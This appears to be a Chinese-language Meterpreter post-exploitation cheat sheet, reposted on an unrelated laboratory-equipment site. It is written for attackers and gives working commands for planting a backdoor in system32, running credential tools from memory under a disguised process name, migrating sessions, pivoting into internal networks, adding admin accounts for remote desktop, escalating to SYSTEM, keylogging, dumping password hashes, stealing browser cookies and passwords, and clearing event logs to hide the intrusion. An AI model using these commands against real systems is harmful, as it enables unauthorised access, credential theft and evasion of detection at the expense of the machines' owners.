meterpreter实用命令

您所在的位置:网站首页 管理员打开记事本的命令 meterpreter实用命令

meterpreter实用命令

2024-07-11 05:40:28| 来源: 网络整理| 查看: 265

meterpreter实用命令

1、background命令 返回,把meterpreter后台挂起 2、session命令 session 命令可以查看已经成功获取的会话 可以使用session -i 连接到指定序号的meterpreter会话已继续利用 3、shell命令 获取目标主机的远程命令行shell 如果出错,考虑是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再尝试 4、cat命令 查看目标主机上的文档内容 例如:cat C:\boot.ini 查看目标主机启动引导信息 5、getwd命令 获取系统工作的当前目录 6、upload命令 上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下 upload setup.exe C:\windows\system32 7、download命令 把目标主机上的文件下载到我们的攻击主机上 例如:把目标主机C盘根目录下的boot.ini文件下载到攻击主机的/root/目录下 download C:\boot.ini /root/ 8、edit命令 调用vi编辑器,对目标主机上的文件修改 例如修改目标主机上的hosts文件,使得目标主机访问baidu时去到准备好的钓鱼网站 9、search命令 在目标主机文件系统上查找搜索文件 例如:search -d c:\ -f *.doc 在目标主机C盘下搜索doc文档 10、ipconfig命令 这个不多说,查看目标主机上的网络参数 11、portfwd命令 端口转发 例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开 例如:portfwd add -l 1122 -p 3389 -r 192.168.250.176 把目标主机192.168.250.176的3389端口转发到1122端口 这是只需要连接目标的1122端口就可以打开远程桌面了 rdesktop -u administrator -p 123456 192.168.250.176:1122 12、route命令 使用route命令可以借助meterpreter会话进一步msf渗透内网,我们已经拿下并产生meterpreter反弹会话的主机可能出于内网之中,外有一层NAT,我们无法直接向其内网中其他主机发起攻击,则可以借助已产生的meterpreter会话作为路由跳板,攻击内网其它主机。 可以先使用run get_local_subnets命令查看已拿下的目标主机的内网IP段情况 命令:run get_local_subnets 13、getuid 查看meterpreter注入到目标主机的进程所属用户 14、sysinfo 查看目标主机系统信息 15、ps命令 查看目标主机上运行的进程信息,结合migrate使用 16、migrate 将meterpreter会话移植到另一个进程 例如反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉该word文档,我们获取到的meterpreter会话就会随之关闭,所以把会话进程注入到explorer.exe是一个好方法 可以先用ps命令看一下目标主机的explorer.exe进程的pid 在这里插入图片描述 是1668 然后我们用migrate 1668 把meterpreter会话注入进去 17、execute命令 在目标主机上运行某个程序 例如我们目前注入进程到explorer.exe后,运行用户为超级管理员administrator 我们运行一下目标主机上的记事本程序 execute -f notepad.exe 这样太明显,如果希望隐藏后台执行,加参数-H execute -H -f notepad.exe 此时目标主机桌面没反应,但我们在meterpreter会话上使用ps命令看到了 再看一个,我们运行目标主机上的cmd.exe程序,并以隐藏的方式直接交互到我们的meterpreter会话上 命令: execute -H -i -f cmd.exe 这达到的效果就跟使用shell命令一样了 再来一个,在目标主机内存中直接执行我们攻击主机上的攻击程序,比如wce.exe,又比如木马等,这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。 execute -H -m -d notepad.exe -f wce.exe -a “-o wce.txt” -d 在目标主机执行时显示的进程名称(用以伪装) -m 直接从内存中执行 "-o wce.txt"是wce.exe的运行参数 18、getpid 获取meterpreter会话在目标主机上注入进程的进程号 19、shutdown命令 关闭目标主机 20、后渗透模块post/windows/gather/forensics/enum_drives调用 在获取meterpreter会话session后,调用post/windows/gather/forensics/enum_drives,可获取目标主机存储器信息: 命令,在msfconsole下: use post/windows/gather/forensics/enum_drives set SESSION 1 exploit 效果如图: 在这里插入图片描述 或直接在meterpreter会话中以命令run post/windows/gather/forensics/enum_drives调用。 21、调用getgui后渗透攻击模块 作用:开启目标主机远程桌面,并可添加管理员组账号 命令: run getgui -e 开启目标主机远程桌面 如下图: 在这里插入图片描述 开启目标主机的远程桌面服务后,可以添加账号以便利用 命令: run getgui -u example_username -p example_password 如下图: 在这里插入图片描述 执行成功,可以使用kali的rdesktop命令使用远程桌面连接目标主机 rdesktop -u kali -p meterpreter 192.168.250.176:3389 22、提权命令getsystem 使用getsystem提升当前进城执行账户微system用户,拿到系统最高权限 命令:getsystem 23、键盘记录器功能keyscan 命令: keyscan_start 开启记录目标主机的键盘输入 keyscan_dump 输出截获到的目标键盘输入字符信息 keyscan_stop 停止键盘记录 24、系统账号密码获取 命令:hashdump 在获得system权限的情况下,使用hashdump命令可以到处目标主机的SAM文件,获取目标主机的账号密码hash信息,剩下的可以用爆破软件算出明文密码 25、调用post/windows/gather/enum_applications模块获取目标主机上的软件安装信息 命令:run post/windows/gather/enum_applications 26、调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息 命令:run post/windows/gather/dumplinks 27、调用post/windows/gather/enum_ie后渗透模块,读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码 命令:run post/windows/gather/enum_ie 28、clearev命令 入侵痕迹擦除 在渗透利用过程中难免留下日志等信息痕迹,使用clearev命令擦除痕迹后再跑。 命令:clearev



【本文地址】

公司简介

联系我们

今日新闻


点击排行

实验室常用的仪器、试剂和
说到实验室常用到的东西,主要就分为仪器、试剂和耗
不用再找了,全球10大实验
01、赛默飞世尔科技(热电)Thermo Fisher Scientif
三代水柜的量产巅峰T-72坦
作者:寞寒最近,西边闹腾挺大,本来小寞以为忙完这
通风柜跟实验室通风系统有
说到通风柜跟实验室通风,不少人都纠结二者到底是不
集消毒杀菌、烘干收纳为一
厨房是家里细菌较多的地方,潮湿的环境、没有完全密
实验室设备之全钢实验台如
全钢实验台是实验室家具中较为重要的家具之一,很多

推荐新闻


图片新闻

实验室药品柜的特性有哪些
实验室药品柜是实验室家具的重要组成部分之一,主要
小学科学实验中有哪些教学
计算机 计算器 一般 打孔器 打气筒 仪器车 显微镜
实验室各种仪器原理动图讲
1.紫外分光光谱UV分析原理:吸收紫外光能量,引起分
高中化学常见仪器及实验装
1、可加热仪器:2、计量仪器:(1)仪器A的名称:量
微生物操作主要设备和器具
今天盘点一下微生物操作主要设备和器具,别嫌我啰嗦
浅谈通风柜使用基本常识
 众所周知,通风柜功能中最主要的就是排气功能。在

专题文章

    CopyRight 2018-2019 实验室设备网 版权所有 win10的实时保护怎么永久关闭